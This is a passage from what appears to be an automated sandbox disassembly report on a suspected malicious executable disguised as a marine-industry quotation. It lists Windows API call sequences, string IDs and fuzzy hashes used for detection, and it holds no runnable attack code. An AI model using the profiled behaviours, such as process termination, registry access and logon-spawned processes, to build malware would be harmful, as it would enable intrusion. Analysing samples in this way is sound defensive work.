                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 006C2EB6
                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006C2EE0
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 006C2EF1
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006C2F0B
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 2178440468-0
                                                                            • Opcode ID: c0c3bf3f227dce81e1922cdecbde1ad0d65cfcda22eaeacc183f030515827d2e
                                                                            • Instruction ID: cf94f50da91627dcf7eac0d7216ede849df9e0c44ddaf5408eae97f73bb2742d
                                                                            • Opcode Fuzzy Hash: c0c3bf3f227dce81e1922cdecbde1ad0d65cfcda22eaeacc183f030515827d2e
                                                                            • Instruction Fuzzy Hash: 6E311230644256EFDB20DF18DCA4FA537E2EB8A720F1541A8FA04EB2B1CB71A8409B40
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00697769
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0069778F
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00697792
                                                                            • SysAllocString.OLEAUT32(?), ref: 006977B0
                                                                            • SysFreeString.OLEAUT32(?), ref: 006977B9
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 006977DE
                                                                            • SysAllocString.OLEAUT32(?), ref: 006977EC
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 54de7f1948970acf103d933ffc6c6729505e5c095fa8d65c3dab19a6d723ec58
                                                                            • Instruction ID: e540ec056a30c53b76db281dfec17a50c06341d9f771a2e1ff3713b4d382d224
                                                                            • Opcode Fuzzy Hash: 54de7f1948970acf103d933ffc6c6729505e5c095fa8d65c3dab19a6d723ec58
                                                                            • Instruction Fuzzy Hash: 81219076614219AFDF10DFA9CC88CFB77EEEB097647048025FA19DB260D670DC428764
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00697842
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00697868
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0069786B
                                                                            • SysAllocString.OLEAUT32 ref: 0069788C
                                                                            • SysFreeString.OLEAUT32 ref: 00697895
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 006978AF
                                                                            • SysAllocString.OLEAUT32(?), ref: 006978BD
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 9277daa6e2d64538471292054b8c08f80611af4272be4d3cd97691436d4f15df
                                                                            • Instruction ID: 51a949106dcf3d48006ccaee966d6270df876530fb7625ad6772c66c5002abbf
                                                                            • Opcode Fuzzy Hash: 9277daa6e2d64538471292054b8c08f80611af4272be4d3cd97691436d4f15df
                                                                            • Instruction Fuzzy Hash: D9216D31618204AFDF10AFA8DD88DBA77EEEB097607148135F915CB6A1DA70DC41CB64
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 006A04F2
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006A052E
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CreateHandlePipe
                                                                            • String ID: nul
                                                                            • API String ID: 1424370930-2873401336
                                                                            • Opcode ID: 5f3e948519c3595557d64c93c442404c417648f5f5876888ef8912540cb4cfbb
                                                                            • Instruction ID: 539ffce12801f324f5b7b6424206b821de2018c5d84199edecf348f850a6442c
                                                                            • Opcode Fuzzy Hash: 5f3e948519c3595557d64c93c442404c417648f5f5876888ef8912540cb4cfbb
                                                                            • Instruction Fuzzy Hash: 9021A2709003059FEF20AF29DD04AAA7BB6AF46764F204A18F8A1D22E0D7709D40CF20
                                                                            APIs
                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 006A05C6
                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006A0601
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CreateHandlePipe
                                                                            • String ID: nul
                                                                            • API String ID: 1424370930-2873401336
                                                                            • Opcode ID: 499346446244118eedad5688768451772580032636a73f2fa4d2c3d3cb589fad
                                                                            • Instruction ID: ba31994ef18e0d26a02a81f4318494c6fee7e49f3d1d90b87699c1fd8be85a0d
                                                                            • Opcode Fuzzy Hash: 499346446244118eedad5688768451772580032636a73f2fa4d2c3d3cb589fad
                                                                            • Instruction Fuzzy Hash: 9C2153755003059BEB20AF69DC04EAA77E6BF96734F201A19F9A1E72D0D7709D61CF10
                                                                            APIs
                                                                              • Part of subcall function 0063600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0063604C
                                                                              • Part of subcall function 0063600E: GetStockObject.GDI32(00000011), ref: 00636060
                                                                              • Part of subcall function 0063600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063606A
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006C4112
                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006C411F
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006C412A
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006C4139
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006C4145
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 1025951953-3636473452
                                                                            • Opcode ID: 560de40bf705cb79d003f88fc7c655ce3a7fc5e650142f5a1104d5dd15b90393
                                                                            • Instruction ID: ef84000ba22a23cfe70ff1147e807a34a0bb0ab34494c6ff1efe8d5a1824428b
                                                                            • Opcode Fuzzy Hash: 560de40bf705cb79d003f88fc7c655ce3a7fc5e650142f5a1104d5dd15b90393
                                                                            • Instruction Fuzzy Hash: 5A1193B1140119BEEF118F64CC85EF77F9EEF08798F014111FA18A2150CA769C21DBA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: api-ms-$ext-ms-
                                                                            • API String ID: 0-537541572
                                                                            • Opcode ID: 6f3bc55d1511ffcef1ecdc05aeecd060befaecdefb992aba08aeb18c089e552b
                                                                            • Instruction ID: 51093ea9b1a18083c60ec6af688c6d40703c9b8b9a752e77f34fa318ca4ed354
                                                                            • Opcode Fuzzy Hash: 6f3bc55d1511ffcef1ecdc05aeecd060befaecdefb992aba08aeb18c089e552b
                                                                            • Instruction Fuzzy Hash: 3411D871E05331ABDB224B28DC80B6A77579B01FE1F156224ED06A7391F630EF09C6E0
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                            • String ID: 0.0.0.0
                                                                            • API String ID: 348263315-3771769585
                                                                            • Opcode ID: 735a9afe350c8dadf6db5aa92cc5b6d3605c5cc137cdf570fa624b246b8747cc
                                                                            • Instruction ID: 7c000348254053af0c725491c7d57f20c62d5c33e20cae30be1020a73dbe1af3
                                                                            • Opcode Fuzzy Hash: 735a9afe350c8dadf6db5aa92cc5b6d3605c5cc137cdf570fa624b246b8747cc
                                                                            • Instruction Fuzzy Hash: 8F112671904109AFCF60AB64DC4AEFF77AEDF10761F0101BDF509AA191EF71CA818A64
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0069DA74
                                                                            • LoadStringW.USER32(00000000), ref: 0069DA7B
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0069DA91
                                                                            • LoadStringW.USER32(00000000), ref: 0069DA98
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0069DADC
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0069DAB9
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 4072794657-3128320259
                                                                            • Opcode ID: fb6924840cfd3bbd1395ca0cca18ea532f279d862c1826664c41b32831be6312
                                                                            • Instruction ID: 940bbd5a71df34d43ac54c612a2e50c09ef76ef1204991dcc6329b49427b1d27
                                                                            • Opcode Fuzzy Hash: fb6924840cfd3bbd1395ca0cca18ea532f279d862c1826664c41b32831be6312
                                                                            • Instruction Fuzzy Hash: 950186F25002087FEB10ABA4DD89EF7376DE708311F4054A6F74AE2141EA749E854F74
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(00DBE4E0,00DBE4E0), ref: 006A097B
                                                                            • EnterCriticalSection.KERNEL32(00DBE4C0,00000000), ref: 006A098D
                                                                            • TerminateThread.KERNEL32(0055002D,000001F6), ref: 006A099B
                                                                            • WaitForSingleObject.KERNEL32(0055002D,000003E8), ref: 006A09A9
                                                                            • CloseHandle.KERNEL32(0055002D), ref: 006A09B8
                                                                            • InterlockedExchange.KERNEL32(00DBE4E0,000001F6), ref: 006A09C8
                                                                            • LeaveCriticalSection.KERNEL32(00DBE4C0), ref: 006A09CF
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 95b61838fd2cae543868a3728cf7dd86e971ea0f80af8f915104836abc60f511
                                                                            • Instruction ID: 6b806664754e569718a831f88984e32a31566db31b7c42bf2ed292a726625780
                                                                            • Opcode Fuzzy Hash: 95b61838fd2cae543868a3728cf7dd86e971ea0f80af8f915104836abc60f511
                                                                            • Instruction Fuzzy Hash: 9AF01D31442902ABE7415B94EE88EE6BA26FF01712F403015F105908A0C7749965DF90
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 00635D30
                                                                            • GetWindowRect.USER32(?,?), ref: 00635D71
                                                                            • ScreenToClient.USER32(?,?), ref: 00635D99
                                                                            • GetClientRect.USER32(?,?), ref: 00635ED7
                                                                            • GetWindowRect.USER32(?,?), ref: 00635EF8
                                                                            Similarity
                                                                            • API ID: Rect$Client$Window$Screen
                                                                            • String ID:
                                                                            • API String ID: 1296646539-0
                                                                            • Opcode ID: 9c0d3345a64a6d0f49a824b6b3bb10bbd82a343cc3da7f7847379e0dcd6a81d3
                                                                            • Instruction ID: cd41b90beb72414225866b8d9738002a0c7d2841a6c95fd59367474c107f3ee7
                                                                            • Opcode Fuzzy Hash: 9c0d3345a64a6d0f49a824b6b3bb10bbd82a343cc3da7f7847379e0dcd6a81d3
                                                                            • Instruction Fuzzy Hash: 00B16835A0074ADBDB10CFA9C4847EAB7F2FF48310F14941AE8AAD7250DB34EA51DB94
                                                                            APIs
                                                                            • GetMenu.USER32(?), ref: 006C2183
                                                                            • GetMenuItemCount.USER32(00000000), ref: 006C21B5
                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006C21DD
                                                                            • GetMenuItemID.USER32(?,?), ref: 006C224D
                                                                            • GetSubMenu.USER32(?,?), ref: 006C225B
                                                                              • Part of subcall function 00693A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00693A57
                                                                              • Part of subcall function 00693A3D: GetCurrentThreadId.KERNEL32 ref: 00693A5E
                                                                              • Part of subcall function 00693A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006925B3), ref: 00693A65
                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006C22E3
                                                                              • Part of subcall function 0069E97B: Sleep.KERNEL32 ref: 0069E9F3
                                                                            Similarity
                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow
                                                                            • String ID:
                                                                            • API String ID: 2039446747-0
                                                                            • Opcode ID: 750415ea3755ac6ccaa33e8692b66e15965e77d1467ea3e6b637f84903dd835c
                                                                            • Instruction ID: 3fa1aab453883d1625762fdbe870ccda472b6a251c79a5a2048999f6ebb9af0e
                                                                            • Opcode Fuzzy Hash: 750415ea3755ac6ccaa33e8692b66e15965e77d1467ea3e6b637f84903dd835c
                                                                            • Instruction Fuzzy Hash: 6B716D75A00216AFCB54EF64C851EBEB7F6EF88320F14845DE916AB341DB34EE418B90
                                                                            APIs
                                                                              • Part of subcall function 006BC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006BB6AE,?,?), ref: 006BC9B5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006BBCCA
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006BBD25
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 006BBD6A
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006BBD99
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006BBDF3
                                                                            • RegCloseKey.ADVAPI32(?), ref: 006BBDFF
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                            • String ID:
                                                                            • API String ID: 3451389628-0
                                                                            • Opcode ID: 109f896596997c27ca734264328bd808a7e05cdd5d7c1bedb7858197cec22373
                                                                            • Instruction ID: 91acd81dd61a7aafbde48269fe35c0ae7c6c276690f4f132c1760f29b0e0f486
                                                                            • Opcode Fuzzy Hash: 109f896596997c27ca734264328bd808a7e05cdd5d7c1bedb7858197cec22373
                                                                            • Instruction Fuzzy Hash: 3F81C270208241EFD714DF24C891EAABBE6FF84318F14995CF4994B2A2CB71ED45CB92
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000035), ref: 0068F7B9
                                                                            • SysAllocString.OLEAUT32(00000001), ref: 0068F860
                                                                            • VariantCopy.OLEAUT32(0068FA64,00000000), ref: 0068F889
                                                                            • VariantClear.OLEAUT32(0068FA64), ref: 0068F8AD
                                                                            • VariantCopy.OLEAUT32(0068FA64,00000000), ref: 0068F8B1
                                                                            • VariantClear.OLEAUT32(?), ref: 0068F8BB
                                                                            Similarity
                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                            • String ID:
                                                                            • API String ID: 3859894641-0
                                                                            • Opcode ID: 7e69d703b04f3d063b6a2898e4e3a5f7ecb2aa869b9d227084843c10298ef643
                                                                            • Instruction ID: 744674723c02424d745db3d2df41f69d99708f45af861770ae7bb5e2c168743e
                                                                            • Opcode Fuzzy Hash: 7e69d703b04f3d063b6a2898e4e3a5f7ecb2aa869b9d227084843c10298ef643
                                                                            • Instruction Fuzzy Hash: 2D51B731A00310BACF64BF65D895B69B3E7EF45310F24956BE905EF291DB708C41CBAA
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • BeginPaint.USER32(?,?,?), ref: 00649241
                                                                            • GetWindowRect.USER32(?,?), ref: 006492A5
                                                                            • ScreenToClient.USER32(?,?), ref: 006492C2
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 006492D3
                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00649321
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006871EA
                                                                              • Part of subcall function 00649339: BeginPath.GDI32(00000000), ref: 00649357
                                                                            Similarity
                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 3050599898-0
                                                                            • Opcode ID: 5c033eca0e0f4abf6b6898d88fb37703c1f93876195a1cf9357913b604c96b2a
                                                                            • Instruction ID: bda3ec896babdc9ba1d21f1daf805be0366f72daa07c9b6374aad90e90ccbae0
                                                                            • Opcode Fuzzy Hash: 5c033eca0e0f4abf6b6898d88fb37703c1f93876195a1cf9357913b604c96b2a
                                                                            • Instruction Fuzzy Hash: 4C419D30144240EFD721DF25CC88FBB7BAAEF86324F144269F994872E1CB71A945DB61
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 006A080C
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 006A0847
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 006A0863
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 006A08DC
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006A08F3
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 006A0921
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3368777196-0
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0068F3AB,00000000,?,?,00000000,?,0068682C,00000004,00000000,00000000), ref: 006C824C
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 006C8272
                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 006C82D1
                                                                            • ShowWindow.USER32(00000000,00000004), ref: 006C82E5
                                                                            • EnableWindow.USER32(00000000,00000001), ref: 006C830B
                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 006C832F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            APIs
                                                                              • Part of subcall function 00690FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00690FCA
                                                                              • Part of subcall function 00690FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00690FD6
                                                                              • Part of subcall function 00690FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00690FE5
                                                                              • Part of subcall function 00690FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00690FEC
                                                                              • Part of subcall function 00690FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00691002
                                                                            • GetLengthSid.ADVAPI32(?,00000000,00691335), ref: 006917AE
                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 006917BA
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 006917C1
                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 006917DA
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00691335), ref: 006917EE
                                                                            • HeapFree.KERNEL32(00000000), ref: 006917F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                            • String ID:
                                                                            • API String ID: 3008561057-0
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 006914FF
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00691506
                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00691515
                                                                            • CloseHandle.KERNEL32(00000004), ref: 00691520
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0069154F
                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00691563
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 1413079979-0
                                                                            APIs
                                                                              • Part of subcall function 00649639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00649693
                                                                              • Part of subcall function 00649639: SelectObject.GDI32(?,00000000), ref: 006496A2
                                                                              • Part of subcall function 00649639: BeginPath.GDI32(?), ref: 006496B9
                                                                              • Part of subcall function 00649639: SelectObject.GDI32(?,00000000), ref: 006496E2
                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 006C8A4E
                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 006C8A62
                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 006C8A70
                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 006C8A80
                                                                            • EndPath.GDI32(?), ref: 006C8A90
                                                                            • StrokePath.GDI32(?), ref: 006C8AA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                            • String ID:
                                                                            • API String ID: 43455801-0
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00695218
                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00695229
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00695230
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00695238
                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0069524F
                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00695261
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: CapsDevice$Release
                                                                            • String ID:
                                                                            • API String ID: 1035833867-0
                                                                            APIs
                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00631BF4
                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00631BFC
                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00631C07
                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00631C12
                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00631C1A
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00631C22
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Virtual
                                                                            • String ID:
                                                                            • API String ID: 4278518827-0
                                                                            APIs
                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0069EB30
                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0069EB46
                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0069EB55
                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0069EB64
                                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0069EB6E
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0069EB75
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                            • String ID:
                                                                            • API String ID: 839392675-0
                                                                            APIs
                                                                            • GetClientRect.USER32(?), ref: 00687452
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 00687469
                                                                            • GetWindowDC.USER32(?), ref: 00687475
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 00687484
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00687496
                                                                            • GetSysColor.USER32(00000005), ref: 006874B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
